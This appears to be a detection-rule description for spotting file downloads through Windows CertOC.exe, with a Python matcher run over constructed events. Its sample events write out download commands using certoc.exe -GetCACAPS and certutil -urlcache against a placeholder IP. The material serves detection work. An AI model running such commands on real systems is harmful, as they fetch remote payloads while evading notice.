
Summary
This detection rule identifies malicious activity in which files are downloaded with CertOC.exe, a Windows utility that adversaries often leverage for command-and-control activity. The rule focuses on process creation events and specifies the conditions under which CertOC.exe is invoked. Its key indicators are a process image ending in '\certoc.exe' and a command line that contains both '-GetCACAPS' and a URL (indicating an HTTP request). The rule combines these selections so that an alert is triggered on potential abuse of the CertOC.exe executable. The detection is relevant because CertOC performs network-related functions that can be exploited for unauthorized file downloads or data exfiltration. Baseline activity should be reviewed to mitigate false positives, since legitimate uses of CertOC.exe may exist in some organizational contexts.
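As an added example (not part of the original rule or any project's code), the two selections described above applied in Python to constructed Sysmon-style process creation events; the field names Image and CommandLine, the helper names, and all sample values are assumptions made for this illustration.

```python
import re
from typing import Optional

# Constructed sample process-creation events (Sysmon Event ID 1 style fields, not real telemetry).
# 198.51.100.0/24 is a documentation address range, used here as a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certoc.exe",
     "CommandLine": r"certoc.exe -GetCACAPS http://198.51.100.7/file.txt"},   # both selections: alert
    {"Image": r"C:\Windows\System32\certoc.exe",
     "CommandLine": r"certoc.exe -v"},                                        # no switch, no URL: quiet
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -f http://198.51.100.7/x"},       # different image: quiet
    {"Image": r"C:\Tools\CertOC.EXE",
     "CommandLine": r"CertOC.EXE -getcacaps HTTPS://ca.corp.example/ca"},     # mixed case, odd path: alert
]

# Any http:// or https:// token in the command line counts as "a URL" for this rule.
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def matches_certoc_download(event: dict) -> bool:
    """True when the event satisfies both selections of the rule summarised above."""
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "")
    # Selection 1: image ends with '\certoc.exe', path-agnostic and case-insensitive
    # (Sigma string matching is case-insensitive by default).
    if not image.endswith("\\certoc.exe"):
        return False
    # Selection 2: the -GetCACAPS switch and an HTTP(S) URL both appear in the command line.
    return "-getcacaps" in cmdline.lower() and URL_RE.search(cmdline) is not None


def extract_url(cmdline: str) -> Optional[str]:
    """Pull the remote URL out of the command line for triage and enrichment."""
    m = URL_RE.search(cmdline)
    return m.group(0) if m else None


def triage(events: list) -> list:
    """Run the rule over a batch of events; return (command line, URL) for each hit."""
    return [(ev["CommandLine"], extract_url(ev["CommandLine"]))
            for ev in events if matches_certoc_download(ev)]


if __name__ == "__main__":
    for cmd, url in triage(SAMPLE_EVENTS):
        print(f"ALERT CertOC download: {cmd}  ->  remote: {url}")
```

The third event shows why the image check matters: the same URL fetched by a different binary is out of scope for this rule and belongs to a separate detection.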
Categories
- Windows
Data Sources
- Process
Created: 2022-05-16